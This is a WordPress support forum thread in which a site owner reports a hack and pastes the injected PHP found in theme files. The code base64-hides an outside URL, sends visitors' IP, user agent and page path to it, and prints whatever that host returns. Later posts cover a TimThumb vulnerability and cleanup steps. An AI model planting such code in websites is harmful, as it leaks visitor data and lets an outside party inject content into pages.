WordPress.org

Ready to get started?Download WordPress

Forums

Security Problem (11 posts)

  1. giangel84
    Member
    Posted 2 years ago #

    Hi to all.

    I hope that this thread is into correct section, else, please move it to the right way.

    Recently i've encountered a several security problems on my wordpress website.

    All was started while a lot of spam was sended from my server (Contact Form 7 3.0 Exploit? also though Really simple captcha is installed!)

    Looking into ftp i've found these issues:

    All .htaccess files were modified by insert some allow code into these.

    There was created more folders randomly named, and was found into wp-content directory.

    All .php files named like "index", "footer", and "main" was modified and into them i've found this php code:

    <?php
        // This code use for global bot statistic
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
        $stCurlHandle = NULL;
        $stCurlLink = "";
        if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
        {
            if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
            $stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
                $stCurlHandle = curl_init( $stCurlLink );
        }
        }
    if ( $stCurlHandle !== NULL )
    {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        $sResult = @curl_exec($stCurlHandle);
        if ($sResult[0]=="O")
         {$sResult[0]=" ";
          echo $sResult; // Statistic code end
          }
        curl_close($stCurlHandle);
    }
    ?>

    So, i'm sure that there aren't any plugins that could be the cause.
    I'm sure also that all files and folders permits are correctly setted.

    I don't know if these problem maybe caused by my Hosting security issue, or by a missing .htaccess configuration.

    Can I lock in anyway, external access in order to fix the above issues?

    Thanks a lot and sorry for my english!

  2. Japh
    Member
    Posted 2 years ago #

    Hello can you please clarify what version of WordPress you are running? Is it the latest (3.2.1)

    Also, does your theme (or possibly any of your plugins) use the TimThumb script? You can find some information on the recent exploit of the previous TimThumb version and how to fix it here: http://markmaunder.com/2011/08/01/zero-day-vulnerability-in-many-wordpress-themes/

    I hope that helps you.

  3. giangel84
    Member
    Posted 2 years ago #

    Yes, i'm using the last (3.2.1) WordPress version.

    I think that i've found the problem and it was fixed.

    So there are the steps that i've executed:

    1) First i've looking for any plugin that can include "timthumb.php" file function, like "Logo Management" and "WP-Mobile-Detector".
    These were disabled and deleted.

    2) Reinstalled original WordPress files; Dashboard->Updates->Reinstall WordPress 3.2.1 version.

    3) Reinstall original Plugins that was modified by the script.

    4) Cleared the theme's files by deleting the added php script code (look script in the post above).

    5) Scan the website with Sucuri Online check tools (http://sitecheck.sucuri.net/scanner)

    6) Modify FTP password.

    End.

    Thank you very much Japh for your advice about "timthumb".
    It was strongly useful.

  4. Japh
    Member
    Posted 2 years ago #

    I'm really pleased to hear you got it all fixed! Glad I could point you in the right direction :)

  5. giangel84
    Member
    Posted 2 years ago #

    Yes Japh.

    Thank you so much again! :)

    This is the malware that i've encountered in my case (for help others users):
    http://sucuri.net/malware/malware-entry-mwjs159

    Bye!

  6. Kapi31
    Member
    Posted 2 years ago #

    Hello!

    Unfortunatively I'm encountering the same issue... and not on 1 site, but 5. 4 are in WordPress.

    I have local saves of my websites so I believe that I will only have to delete and replace all the files by my saved copies... even if it will be a huge work. Correct?

    I have already changed my ftp access pwd.

    BUT I have a question... Do you know if the virus changes the permissions on the different dir and files?

    I have noticed that the virus has also added code to index.html and other html files at the root of some dir...

    Other question... My antivirus has founded anything on my machine. When I have noticed an issue... I think that it was a trap... I have immediately restore the system configuration on a previous date. But should I reinstall all my system?

    Many thanks for your help.

  7. @Kapi31, Please start your own thread.

  8. Kapi31
    Member
    Posted 2 years ago #

    Sure.
    Done.
    Thx.

  9. Terry
    Member
    Posted 1 year ago #

    Great information. Same boat.

    Could you tell me the easiest way to "look for any plugin that can include "timthumb.php" file function"?

    Is there a easy way to find these type of plugins?

    Thanks in advance.

  10. esmi
    Theme Diva & Forum Moderator
    Posted 1 year ago #

    Please post a new topic.

  11. Terry
    Member
    Posted 1 year ago #

    Sorry, did not think posting a new topic / starting a new thread since "giangel84" had already stated here:

    1) First i've looking for any plugin that can include "timthumb.php" file function, like "Logo Management" and "WP-Mobile-Detector".
    These were disabled and deleted.

    Seems like extra clutter to me, but you the boss.

Topic Closed

This topic has been closed to new replies.

About this Topic